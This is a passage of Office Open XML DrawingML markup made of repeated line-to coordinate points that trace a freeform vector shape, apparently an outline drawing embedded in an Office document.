                  <a:pt x="1115" y="417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="832" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="624" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415" y="814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609" y="1001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="693" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="1133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="1133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="1140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727" y="1140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="748" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="859" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="859" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="1202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="1230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="1209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019" y="1195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="1175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="1175"/>
                </a:lnTo>
                <a:lnTo>
